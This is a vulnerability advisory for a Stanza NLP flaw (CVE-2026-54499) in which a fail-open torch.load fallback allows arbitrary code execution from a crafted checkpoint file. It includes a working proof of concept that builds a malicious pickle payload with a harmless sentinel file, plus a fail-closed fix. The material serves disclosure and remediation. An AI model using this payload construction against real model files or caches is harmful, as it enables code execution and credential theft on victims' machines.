Mend.io Vulnerability Database
The largest open source vulnerability database
CVE-2026-54499
Published: June 19, 2026
Updated: June 21, 2026
Summary

Stanza 1.12.0 attempts to safely load PyTorch checkpoint files using "torch.load(..., weights_only=True)", but automatically falls back to the fully unsafe "torch.load(..., weights_only=False)" when the safe load raises "pickle.UnpicklingError". The attacker fully controls this condition: any ".pt" file that contains a single unsupported pickle global triggers it. An attacker who can place a malicious pretrain or model file on disk (via supply-chain compromise, a poisoned model repository, or a shared model cache) can achieve arbitrary code execution on any machine that loads a Stanza NLP pipeline. The code executes inside Stanza's own pretrain-loading API; the victim does not need to call "torch.load" directly.

Details

The vulnerable code is in "pretrain.py#L59-L67" (https://github.com/stanfordnlp/stanza/blob/main/stanza/models/common/pretrain.py#L59-L67) (Stanza 1.12.0):

    try:
        data = torch.load(self.filename, lambda storage, loc: storage, weights_only=True)
    except UnpicklingError:
        data = torch.load(self.filename, lambda storage, loc: storage, weights_only=False)

When "weights_only=True" is passed, PyTorch's deserializer raises "pickle.UnpicklingError" for any object whose class or callable is not on the safe-globals allowlist. This is the intended safety mechanism. However, Stanza catches that exception and immediately reloads the same attacker-controlled file with "weights_only=False", which invokes Python's full pickle deserializer and executes any "__reduce__" payload in the file without restriction.

An attacker can trigger the fallback reliably and at will by embedding one unsupported pickle global (e.g., "builtins.open") anywhere in an otherwise structurally valid Stanza pretrain state dict. The safe load rejects it; the unsafe reload runs it.
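The fail-open behavior described above can be reproduced without PyTorch. The following is a minimal sketch using only the standard library: "NoGlobalsUnpickler", "safe_load", and "fail_open_load" are hypothetical names that stand in for the "weights_only=True" load and Stanza's fallback, and are not the actual PyTorch or Stanza implementations. The payload only creates an empty sentinel file in a temporary directory.

```python
import io
import os
import pickle
import tempfile


class NoGlobalsUnpickler(pickle.Unpickler):
    """Stand-in for a restricted loader: rejects every global not on the allowlist."""

    ALLOWED = frozenset()  # hypothetical allowlist; left empty for this sketch

    def find_class(self, module, name):
        if (module, name) not in self.ALLOWED:
            raise pickle.UnpicklingError(f"unsupported global: {module}.{name}")
        return super().find_class(module, name)


def safe_load(blob):
    """Restricted load: plain containers and numbers only."""
    return NoGlobalsUnpickler(io.BytesIO(blob)).load()


def fail_open_load(blob):
    """Mirrors the vulnerable pattern: retry with full pickle when the safe load fails."""
    try:
        return safe_load(blob)
    except pickle.UnpicklingError:
        return pickle.loads(blob)  # unrestricted: executes the embedded payload


class HarmlessPayload:
    """Demonstrates execution by making the unpickler call open(path, "w")."""

    def __init__(self, path):
        self.path = path

    def __reduce__(self):
        return (open, (self.path, "w"))


sentinel = os.path.join(tempfile.mkdtemp(), "sentinel")
blob = pickle.dumps({"emb": [0.0, 0.0], "payload": HarmlessPayload(sentinel)})

# Control: the restricted load rejects the file before anything runs.
try:
    safe_load(blob)
    safe_rejected = False
except pickle.UnpicklingError:
    safe_rejected = True
exists_after_safe = os.path.exists(sentinel)

# The fallback swallows the rejection and runs the payload.
loaded = fail_open_load(blob)
loaded["payload"].close()  # the payload returned an open file handle
exists_after_fallback = os.path.exists(sentinel)

print(safe_rejected, exists_after_safe, exists_after_fallback)
```

The restricted load alone leaves no sentinel behind; the file appears only once the except branch retries with the unrestricted loader, which is the same sequence the advisory describes for "Pretrain.load()".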
The same try/except pattern appears at five sites in Stanza 1.12.0, including the pretrain loader above:

| File | Lines |
|------|-------|
| "stanza/models/common/pretrain.py" | 64–66 |
| "stanza/models/coref/model.py" | 251–253, 329–331 |
| "stanza/models/classifiers/trainer.py" | 80–82 |
| "stanza/models/constituency/base_trainer.py" | 94–96 |

Additionally, "stanza/models/lemma_classifier/base_model.py:127" calls "torch.load(filename, lambda storage, loc: storage)" with no "weights_only" argument at all, which defaults to "False" on any PyTorch < 2.6.

The call chain from the public API to the vulnerable fallback is:

    stanza.models.common.foundation_cache.load_pretrain(path)
      → FoundationCache.load_pretrain(path)
      → stanza.models.common.pretrain.Pretrain(filename)
      → Pretrain.emb (property access triggers load)
      → Pretrain.load()
      → torch.load(..., weights_only=True)   # raises UnpicklingError
      → torch.load(..., weights_only=False)  # executes arbitrary pickle

PoC

Environment: Python 3.11, "stanza==1.12.0", "torch==2.12.0"

Step 1: Install dependencies:

    pip install stanza==1.12.0 torch==2.12.0

Step 2: Save the following as "exploit.py":

    import os
    from pathlib import Path

    import torch
    import stanza
    from stanza.models.common.foundation_cache import FoundationCache, load_pretrain
    from stanza.models.common.vocab import VOCAB_PREFIX

    SENTINEL = "/tmp/stanza_rce_proof"
    MODEL = "/tmp/stanza_malicious.pt"

    class HarmlessPayload:
        """Demonstrates execution; writes a sentinel file."""
        def __init__(self, path):
            self.path = path
        def __reduce__(self):
            return (open, (self.path, "w"))

    # Build a structurally valid Stanza pretrain state dict with the payload embedded.
    words = VOCAB_PREFIX + ["hello"]
    state = {
        "vocab": {
            "lang": "", "idx": 0, "cutoff": 0, "lower": False,
            "_id2unit": words,
            "_unit2id": {w: i for i, w in enumerate(words)},
        },
        "emb": torch.zeros((len(words), 2), dtype=torch.float32),
        "payload": HarmlessPayload(SENTINEL),  # ← the malicious object
    }
    torch.save(state, MODEL)

    # Confirm safe-only load raises UnpicklingError and does NOT create sentinel.
    try:
        torch.load(MODEL, lambda s, l: s, weights_only=True)
        print("UNEXPECTED: safe load succeeded (no fallback needed)")
    except Exception as e:
        print(f"Control: safe load raised {type(e).__name__} : sentinel exists: {Path(SENTINEL).exists()}")

    # Load through the real Stanza API. The fallback fires and the sentinel is created.
    cache = FoundationCache()
    pretrain = load_pretrain(MODEL, foundation_cache=cache)
    print(f"stanza={stanza.__version__} torch={torch.__version__}")
    print(f"emb_shape={tuple(pretrain.emb.shape)}")
    print(f"sentinel_exists={Path(SENTINEL).exists()}")
    print("VERDICT: ACTUAL_VULN_REAL_STANZA_PATH" if Path(SENTINEL).exists() else "VERDICT: UNPROVEN")

Step 3: Run:

    python exploit.py

Expected output (confirmed):

    Control: safe load raised UnpicklingError : sentinel exists: False
    stanza=1.12.0 torch=2.12.0
    emb_shape=(5, 2)
    sentinel_exists=True
    VERDICT: ACTUAL_VULN_REAL_STANZA_PATH

The sentinel is created exclusively by the Stanza pretrain-loading API invoking the unsafe fallback, not by a direct "torch.load" call in the PoC.

Impact

Vulnerability class: CWE-502: Deserialization of Untrusted Data

Who is impacted: Any user, researcher, CI/CD pipeline, or production NLP service that loads a Stanza model pretrain file from a source whose integrity the victim does not exclusively control and cryptographically verify.
Concretely:

- Developers who run "stanza.Pipeline(lang)" after downloading models from HuggingFace or GitHub
- CI pipelines that automatically refresh Stanza models during builds
- Research environments that share pretrain files over shared network storage or model repositories

Attack prerequisites: The attacker must be able to place a malicious ".pt" pretrain file at a path that Stanza will load. Realistic delivery vectors include:

- Compromise of a HuggingFace model repository hosting Stanza pretrain weights
- Poisoning of a shared model cache directory (NFS, S3, artifact store)
- A malicious pretrain file distributed via a third-party fine-tuning hub or research repo

What an attacker achieves: Arbitrary code execution with the full privileges of the process running "stanza.Pipeline()", typically on a developer workstation, a Jupyter notebook server, or a GPU training node. This allows credential theft (HuggingFace tokens, cloud IAM keys from environment variables), persistent backdoors, data exfiltration, and lateral movement in multi-tenant training infrastructure.

Recommended fix: Remove the unsafe fallback entirely. If "weights_only=True" raises "UnpicklingError", fail closed:

    try:
        data = torch.load(self.filename, lambda storage, loc: storage, weights_only=True)
    except UnpicklingError as e:
        raise RuntimeError(
            f"Refusing to load legacy pretrain file {self.filename!r} with unsafe "
            "deserialization. Regenerate the file using a trusted Stanza migration tool."
        ) from e

If legacy NumPy-containing pretrain files must be supported, use PyTorch's "torch.serialization.add_safe_globals()" API to allowlist the specific NumPy dtypes required, rather than disabling all safety checks. Apply the same fix to all six affected loaders listed above.
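The fail-closed approach with a narrow allowlist can be illustrated with the standard library alone. This is a sketch under stated assumptions, not Stanza's or PyTorch's code: "SAFE_GLOBALS", "AllowlistUnpickler", and "fail_closed_load" are hypothetical names, and the allowlisted "collections.OrderedDict" merely stands in for whatever legacy types a real loader would need to register.

```python
import collections
import io
import os
import pickle
import tempfile

# Hypothetical allowlist: only the specific legacy types that must keep loading.
SAFE_GLOBALS = {("collections", "OrderedDict")}


class AllowlistUnpickler(pickle.Unpickler):
    """Resolves allowlisted globals only; everything else is rejected."""

    def find_class(self, module, name):
        if (module, name) not in SAFE_GLOBALS:
            raise pickle.UnpicklingError(f"unsupported global: {module}.{name}")
        return super().find_class(module, name)


def fail_closed_load(blob, source="<bytes>"):
    """Load with the allowlist and refuse, rather than retry unsafely, on rejection."""
    try:
        return AllowlistUnpickler(io.BytesIO(blob)).load()
    except pickle.UnpicklingError as e:
        raise RuntimeError(
            f"Refusing to load {source!r} with unsafe deserialization."
        ) from e


class HarmlessPayload:
    """Would create a sentinel file if an unrestricted loader ran it."""

    def __init__(self, path):
        self.path = path

    def __reduce__(self):
        return (open, (self.path, "w"))


# A legacy-style file that needs one allowlisted type still loads.
legacy_blob = pickle.dumps(collections.OrderedDict(emb=[0.0, 0.0]))
legacy = fail_closed_load(legacy_blob, "legacy.pt")

# A file carrying a payload is refused and the payload never runs.
sentinel = os.path.join(tempfile.mkdtemp(), "sentinel")
bad_blob = pickle.dumps({"emb": [0.0], "payload": HarmlessPayload(sentinel)})
try:
    fail_closed_load(bad_blob, "malicious.pt")
    refused = False
except RuntimeError:
    refused = True

print(type(legacy).__name__, refused, os.path.exists(sentinel))
```

The design point is that widening the allowlist is an explicit, reviewable decision per type, whereas the fallback in the vulnerable code widens it to everything whenever a file asks.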
Affected Packages
stanza (CONDA):
Affected version(s) >=1.1.1 <1.12.2
Fix Suggestion:
Update to version 1.12.2
stanza (PYTHON):
Affected version(s) >=0.1 <1.12.2
Fix Suggestion:
Update to version 1.12.2
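To check whether an installed Stanza falls in the affected PyPI range above, a small version comparison is enough. The sketch below assumes plain numeric release versions such as "1.12.0"; the helpers "parse_release", "is_affected", and "installed_stanza_is_affected" are hypothetical, and pre-release suffixes (for example "rc1") are ignored rather than ordered correctly.

```python
from importlib import metadata

FIRST_AFFECTED = (0, 1, 0)   # PyPI range lower bound: >=0.1
FIRST_FIXED = (1, 12, 2)     # PyPI range upper bound: <1.12.2


def parse_release(version):
    """Turn '1.12.0' into (1, 12, 0); non-numeric suffixes are dropped."""
    parts = []
    for piece in version.split(".")[:3]:
        digits = ""
        for ch in piece:
            if not ch.isdigit():
                break
            digits += ch
        parts.append(int(digits) if digits else 0)
    while len(parts) < 3:
        parts.append(0)
    return tuple(parts)


def is_affected(version):
    """True when the version lies in the affected range listed for PyPI."""
    return FIRST_AFFECTED <= parse_release(version) < FIRST_FIXED


def installed_stanza_is_affected():
    """Check the local environment; returns None when stanza is not installed."""
    try:
        return is_affected(metadata.version("stanza"))
    except metadata.PackageNotFoundError:
        return None


print(is_affected("1.12.0"), is_affected("1.12.2"))
```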
CVSS v4
Base Score: 7.7
Attack Vector: NETWORK
Attack Complexity: HIGH
Attack Requirements: NONE
Privileges Required: NONE
User Interaction: PASSIVE
Vulnerable System Confidentiality: HIGH
Vulnerable System Integrity: HIGH
Vulnerable System Availability: HIGH
Subsequent System Confidentiality: NONE
Subsequent System Integrity: NONE
Subsequent System Availability: NONE
CVSS v3
Base Score: 7.5
Attack Vector: NETWORK
Attack Complexity: HIGH
Privileges Required: NONE
User Interaction: REQUIRED
Scope: UNCHANGED
Confidentiality: HIGH
Integrity: HIGH
Availability: HIGH
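The CVSS v3 base score can be reproduced from the metrics listed above. The sketch below assumes the CVSS v3.1 specification's metric weights and rounding rule (the page does not say whether 3.0 or 3.1 was used) and covers only the Scope: UNCHANGED case; the function names are illustrative.

```python
import math

# CVSS v3.1 numeric weights for the metric values listed on this page.
ATTACK_VECTOR_NETWORK = 0.85
ATTACK_COMPLEXITY_HIGH = 0.44
PRIVILEGES_REQUIRED_NONE = 0.85
USER_INTERACTION_REQUIRED = 0.62
IMPACT_HIGH = 0.56


def roundup(value):
    """CVSS v3.1 Roundup: smallest one-decimal number >= value."""
    scaled = round(value * 100000)
    if scaled % 10000 == 0:
        return scaled / 100000.0
    return (math.floor(scaled / 10000) + 1) / 10.0


def base_score_scope_unchanged(av, ac, pr, ui, c, i, a):
    """Base score formula for Scope: UNCHANGED."""
    iss = 1 - (1 - c) * (1 - i) * (1 - a)
    impact = 6.42 * iss
    exploitability = 8.22 * av * ac * pr * ui
    if impact <= 0:
        return 0.0
    return roundup(min(impact + exploitability, 10))


score = base_score_scope_unchanged(
    ATTACK_VECTOR_NETWORK,
    ATTACK_COMPLEXITY_HIGH,
    PRIVILEGES_REQUIRED_NONE,
    USER_INTERACTION_REQUIRED,
    IMPACT_HIGH,
    IMPACT_HIGH,
    IMPACT_HIGH,
)
print(score)  # 7.5
```

Impact (about 5.87) plus exploitability (about 1.62) sums to roughly 7.49, which rounds up to the 7.5 shown.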
Weakness Type (CWE)
Use of Potentially Dangerous Function
Deserialization of Untrusted Data